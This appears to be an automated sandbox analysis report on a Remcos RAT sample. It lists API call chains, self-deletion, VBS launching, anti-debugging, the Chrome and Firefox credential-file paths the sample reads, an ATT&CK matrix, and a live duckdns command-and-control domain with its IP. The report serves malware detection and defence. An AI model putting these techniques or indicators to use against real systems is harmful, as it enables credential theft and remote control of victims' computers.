                    Source: xi0TpAxHGMsm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: xi0TpAxHGMsm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: xi0TpAxHGMsm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: xi0TpAxHGMsm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: xi0TpAxHGMsm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: xi0TpAxHGMsm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CB50
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00457106 push ecx; ret 0_2_00457119
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00457A28 push eax; ret 0_2_00457A46
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00434E56 push ecx; ret 0_2_00434E69
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00406EB0 ShellExecuteW,URLDownloadToFileW,0_2_00406EB0
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041AA4A

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Deletes itself after installation
                    Source: C:\Windows\SysWOW64\wscript.exeFile deleted: c:\users\user\desktop\xi0tpaxhgmsm.exeJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CB50
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Delayed program exit found
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040F7A7 Sleep,ExitProcess,0_2_0040F7A7
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_0041A748
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_00409253
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C291
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C34D
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_00409665
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0044E879 FindFirstFileExA,0_2_0044E879
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_0040880C
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040783C FindFirstFileW,FindNextFileW,0_2_0040783C
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419AF5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB30
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD37
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407C97
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1297866075.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1309919172.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310007997.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310125685.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300066641.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1301052479.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000002.1353500932.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1297866075.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1309919172.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310007997.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310125685.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300066641.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1301052479.0000000000718000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000002.1353500932.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW?
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeAPI call chain: ExitProcess graph end nodegraph_0-49203
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004349F9
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CB50
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_004432B5 mov eax, dword ptr fs:[00000030h]0_2_004432B5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00412077 GetProcessHeap,HeapFree,0_2_00412077
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004349F9
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00434B47 SetUnhandledExceptionFilter,0_2_00434B47
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043BB22
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00434FDC
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe0_2_004120F7
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00419627 mouse_event,0_2_00419627
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" Jump to behavior
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Manager
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1297866075.000000000070F000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300066641.0000000000710000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.0000000000702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.0000000000702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managertdeskl
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `Program Managerisk.datseJ(f
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1310007997.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.0000000000702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerRA\
                    Source: xi0TpAxHGMsm.exe, 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager=
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1310125685.0000000000711000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1309919172.0000000000710000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.0000000000702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager{
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1297866075.000000000070F000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300066641.0000000000710000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.0000000000702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerY
                    Source: xi0TpAxHGMsm.exe, 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp, Disk.dat.0.drBinary or memory string: [Program Manager]
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00434C52 cpuid 0_2_00434C52
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: GetLocaleInfoA,0_2_0040F8D1
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: EnumSystemLocalesW,0_2_00452036
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_004520C3
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: GetLocaleInfoW,0_2_00452313
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: EnumSystemLocalesW,0_2_00448404
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0045243C
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: GetLocaleInfoW,0_2_00452543
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00452610
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: GetLocaleInfoW,0_2_004488ED
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00451CD8
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: EnumSystemLocalesW,0_2_00451F50
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: EnumSystemLocalesW,0_2_00451F9B
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041B7FF GetSystemTimes,Sleep,GetSystemTimes,__aulldiv,0_2_0041B7FF
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041B60D GetComputerNameExW,GetUserNameW,0_2_0041B60D
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00449190
                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: xi0TpAxHGMsm.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: xi0TpAxHGMsm.exe PID: 524, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\Disk\Disk.dat, type: DROPPED
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_0040BA12
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\0_2_0040BB30
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: \key3.db0_2_0040BB30

                    Remote Access Functionality

                    barindex
                    Detected Remcos RAT
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-4QQORAJump to behavior
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: xi0TpAxHGMsm.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: xi0TpAxHGMsm.exe PID: 524, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\Disk\Disk.dat, type: DROPPED
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: cmd.exe0_2_0040569A

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information11
                    Scripting                    		Valid Accounts1
                    Native API                    		11
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts12
                    Command and Scripting Interpreter                    		1
                    DLL Side-Loading                    		1
                    Bypass User Account Control                    		2
                    Obfuscated Files or Information                    		211
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol211
                    Input Capture                    		2
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts2
                    Service Execution                    		1
                    Windows Service                    		1
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		2
                    Credentials In Files                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares3
                    Clipboard Data                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Windows Service                    		1
                    Bypass User Account Control                    		NTDS3
                    File and Directory Discovery                    		Distributed Component Object ModelInput Capture1
                    Remote Access Software                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script22
                    Process Injection                    		1
                    File Deletion                    		LSA Secrets23
                    System Information Discovery                    		SSHKeylogging2
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials21
                    Security Software Discovery                    		VNCGUI Input Capture22
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation                    		DCSync2
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                    Process Injection                    		Proc Filesystem1
                    System Owner/User Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    xi0TpAxHGMsm.exe100%AviraBDS/Backdoor.Gen
                    xi0TpAxHGMsm.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://geoplugin.net/json.gp100%URL Reputationphishing
                    http://geoplugin.net/json.gp/C100%URL Reputationphishing
                    sendfiletiahforem.duckdns.org0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gpT0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gpSystem320%Avira URL Cloudsafe
                    http://geoplugin.net/json.gpI0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gp70%Avira URL Cloudsafe
                    http://geoplugin.net/json.gp-0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gpN0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    sendfiletiahforem.duckdns.org
                    		85.60.29.68
                    		truetrue
                      		unknown
                      geoplugin.net
                      		178.237.33.50
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://geoplugin.net/json.gptrue
                        • URL Reputation: phishing
                        		unknown
                        sendfiletiahforem.duckdns.orgtrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://geoplugin.net/json.gpTxi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://geoplugin.net/json.gp7xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://geoplugin.net/json.gp/Cxi0TpAxHGMsm.exetrue
                        • URL Reputation: phishing
                        		unknown
                        http://geoplugin.net/json.gpIxi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://geoplugin.net/json.gpSystem32xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://geoplugin.net/json.gpNxi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
